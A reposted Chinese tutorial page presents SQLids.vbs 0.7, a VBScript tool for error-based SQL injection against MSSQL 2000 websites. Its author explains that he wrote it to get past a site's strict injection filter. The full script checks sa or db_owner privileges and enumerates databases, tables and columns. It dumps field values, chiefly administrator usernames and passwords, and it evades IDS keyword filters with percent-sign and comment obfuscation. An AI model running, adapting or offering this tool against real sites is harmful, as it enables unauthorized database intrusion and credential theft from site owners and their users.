当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > SQLids.vbs 0.7(最终版,以后改成gui界面的)

VBScript
用vbs清空iis log 中自己登录ip的记录
vbs sendmail发邮件带附件方法
用vbs通过135端口执行命令的脚本
用vbs实现的瞬间关闭多个系统进程的脚本
vbs 中调用shell.application 简单函数
vbs wmi获取电脑硬件信息实例
用vbscript实现隐藏任务栏图标的脚本
vbs正则表达式代码
vbs版IP地理位置查询小偷
超级厉害的VBS定时提醒脚本 Remind.vbs
vbs实现的支持拖动的txt文本切割器
VBS如何察看或获得剪切板内容的脚本
VBS备忘录启动代码
VBS脚本使用WMI操作注册表的代码
vbs xmldom初次实战获取QQ签名的代码
VBS破坏性应用代码
vbs生成ACCESS数据里所有表的字段
vbs实现的图片自适应表格,目前最佳解决方案!
ProcessMagnifier.vbs进程查看
用于提取网易文件的hta代码

VBScript 中的 SQLids.vbs 0.7(最终版,以后改成gui界面的)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-12   浏览: 141 ::
收藏到网摘: n/a

今天搞了个网站,注入点过滤得很变态,工具都不能跑,于是写了这个东东。 是有这个问题的。
第一,应当用正则判断较好。
第二,我用循环加返回结果大于30个长度就退出循环,我相信没有表名和字段名大于30个字母的,但是字段值有可能大于,这个地方解决的不够好。但是一般是用来查后台的管理员的用户名和密码,所以就放弃了。
复制代码 代码如下:

set arg=wscript.arguments
If (LCase(Right(Wscript.fullname,11))="Wscript.Exe") Then
Wscript.Quit
End If
if arg.count=0 then
usage()
Wscript.Quit
End If
Sub usage()
wsh.echo string(79,"*")
wsh.echo "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型,url里有&请用双引号包含url"
wsh.echo "sqlids v0.7 for mssql2000 with error by lcx"
wsh.echo "以下两个脚本可互相参考"
wsh.echo "http://www.ruanchen.com/"
wsh.echo "http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.html"
wsh.echo "Usage:"
wsh.echo "cscript "&wscript.scriptname&" url limit ||----------->得到当前权限"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 limit"
wsh.echo "cscript "&wscript.scriptname&" url dbname ||----------->得到全部库名"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 dbname"
wsh.echo "cscript "&wscript.scriptname&" url table 库名||-------->得到所给库的全部表名"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 table
master"
wsh.echo "cscript "&wscript.scriptname&" url filed 库名 表名 ||---------->得到所给库所给表的全部字段"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 filed master spt_server_info"
wsh.echo "cscript "&wscript.scriptname&" url result 字段名 库名 表名||--->得所给库、表、字段的字段值"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 result id master sysinfo"
wsh.echo "cscript "&wscript.scriptname&" url search 你要查找的字段名||--->根据关键字查找字段"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 search
pass"
wsh.echo string(79,"*")&vbcrlf
end Sub

Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function
Function UrlEncode(str)
str = Replace(str," ","%20")
UrlEncode = str
End Function
Function GetBody(url)' xml得到网页源码,可以改成cookie或get提交
On Error Resume Next
Aurl=Split(url,"?") '这是为post提交的
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "post", Aurl(0), False, "", ""
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.setRequestHeader "Accept-Encoding", "gzip, deflate"
.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR
3.0.04506; .NET CLR 1.1.4322)"
.setRequestHeader "Connection", "Keep-Alive"
.setRequestHeader "Cache-Control", "no-cache"
.Send UrlEncode(Aurl(1)) 'post提交
GetBody = .ResponseBody
.abort
End With
Set Retrieval = Nothing
End Function

Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadTExt
objstream.Close
Set objstream = Nothing
End Function

Function ReplaceKeyWord(Value)'绕过ids过虑
Table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in%
ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown-
>shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har|
[k]|fetch->fe%tch|[k]|nExt->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|Exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k]
|sp_->s%p_|[k]|and->a%nd"
Dim i, Relpacement, Temp
Relpacement = Split(Table, "|[k]|")
ReplaceKeyWord = Value
For i = 0 to UBound(Relpacement)
Temp = Split(Relpacement(i), "->")
If UBound(Temp) = 1 Then ReplaceKeyWord = Replace(ReplaceKeyWord, Temp(0), Temp(1))
NExt
End Function

Function result(sHTMLTEMP) '用varchar做关键字分隔网页内容,用正则帅一点,可惜不太会
aHTML = Split(sHTMLTEMP, "varchar")
If(UBound(aHTML) > 0)Then
sHTMLTEMP = aHTML(1)
aHTML = Split(sHTMLTEMP, "'")
sHTMLTEMP = aHTML(1)
End If
result=sHTMLTEMP
End Function
Function Str2HEx(strHEx)'sql的16进制转换函数
Dim sHEx
For i = 1 To Len(strHEx)
sHEx = sHEx & HEx(Asc(Mid(strHEx,i,1)))&"00"
NExt
Str2HEx = "0x"&sHEx
End Function
Function Str2HExtwo(strHEx)'sql的16进制转换函数
Dim sHEx
For i = 1 To Len(strHEx)
sHEx = sHEx & HEx(Asc(Mid(strHEx,i,1)))
NExt
Str2HExtwo = "0x"&sHEx
End Function

Function MoveR(Rstr) '去重复
Dim i,SpStr
SpStr = Split(Rstr,",")
For i = 0 To Ubound(Spstr)
If I = 0 then
MoveR = MoveR & SpStr(i) & ","
Else
If instr(MoveR,SpStr(i))=0 and i=Ubound(Spstr) Then
MoveR = MoveR & SpStr(i)
Elseif instr(MoveR,SpStr(i))=0 Then
MoveR = MoveR & SpStr(i) & ","
End If
End If
NExt
End Function

function page(sql)
page=Replace(getHTTPPage(url&" "&ReplaceKeyWord(sql)),Chr(34),"")
End Function
url=arg(0)
injection =arg(1)

'--------------------------------------以下代码是注入语句,完全不需要引号
select case arg(1)
Case "limit"
body=Replace(getHTTPPage(url),Chr(34),"")
'语句单独提出来,方便以后修改,第一条是sa,第二条是DB_owner
sqlone="and (select is_srvrolemember(0x730079007300610064006D0069006E00))>0--"
sqltwo="and (select is_member(0x640062005F006F0077006E0065007200))>0--"
Bodyone=page(sqlone)
bodytwo=page(sqltwo)
wsh.echo "当前信息:"
If Len(body)=Len(Bodyone) Then wsh.echo "SA"
If Len(body)=Len(Bodytwo) And Len(body)<>Len(Bodyone) Then
wsh.echo "DB_owner"
Else
wsh.echo "PUBLIC"
End If
sqlthtree="and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--"
rtemp=Split(sqlthtree,"|")
servername=result(page(rtemp(0)))
version=result(page(rtemp(1)))
user=result(page(rtemp(2)))
db_name=result(page(rtemp(3)))
wsh.echo "servername:"&servername
wsh.echo "version:"&version
wsh.echo "user:"& user
wsh.echo "db_name:"& db_name
case "dbname"
i=1
Do
sql="and db_name("&i&")>0--" '暴库名语句
Body = page(sql)
k=InstrRev(body,"varchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0
case "table"
i=1
Do
' 表名语句 agr(2)表示库
sql="and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects
where xtype=0x7500))--"
Body = page(sql)
k=InstrRev(body,"varchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0
case "filed"
sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["&arg(2)&"]..[sy%sob%je%cts] wh%ere name="&Str2HEx(arg(3))&")=0--
"
biaoid=result(page(sqlbiaoid))
biaoid=Replace(biaoid,Chr(124),"")
sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&")=0-- "
k=Replace(result(page(sqlclounmcnt)),Chr(94),"")
wsh.echo "共有列名"&k&"个"
For i=1 To k
sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "&i&" colid,name fr%om ["&arg(2)&"]..[sys%columns] wh%ere
id="&biaoid&" order by colid) t order by colid desc)=0--"
wsh.echo result(page(sqlfiled))
nExt

case "result"
i=1
sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["&arg(3)&"]..["&arg(4)&"] where 1=1)>0--" '暴列的总数目语句
k=result(page(sqlcloum))
k=Replace(k,Chr(94),"")
wsh.echo arg(2)&"字段共有记录数"&k&"个"&vbcrlf
For i=1 To k
sqlneirong= "an%d (se%l%e%c%t to%p 1 ca%st("&arg(2)&" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "&i&" ["&arg(2)&"] fr%om ["&arg(3)&"]..["&arg(4)
&"] wh%ere 1=1 order by ["&arg(2)&"]) t wh%ere 1=1 order by ["&arg(2)&"] desc )=0--"
Body = page(sqlneirong)
wscript.echo Replace(result(body),Chr(94),"")
Next

Case "search"
love=Str2HExtwo(arg(2))
wscript.echo "请稍候,正在查循,暂且只列10条,结果显示为'表名|字段名'格式"
TimeSpend = Timer
For i=1 To 10 '可以根据需要改动这个10
sqlsearch="And (select/* */top/* */1/* */t_name%2bchar(124)%2bc_name/* */from/* */(select/* */top/* */"&i&"/* */object_name(id)/* */as/* */t_name,name/*
*/as/* */c_name/* */from/* */syscolumns/* */where/* */charindEx(cast("&love&"/* */as/* */varchar(2000)),name)%3E0/* */and/* */left(name,1)!=0x40/* */order/*
*/by/* */t_name/* */asc)/* */as/* */T/* */order/* */by/* */t_name/* */desc)>0--"
Body = page(sqlsearch)
body=result(body)
a=a&body&","
NExt
TimeSpend = round(Timer - TimeSpend,2)
wsh.echo MoveR(a)
wsh.echo "用时:" & TimeSpend & "秒."


Case Else
If arg(1)<>"limit" Or arg(1)<>"dbname" Or arg(1)<>"search" Or arg(1)<>"table" Or arg(1)<>"filed" Then
wscript.echo "注意参数"
usage()
End if
end select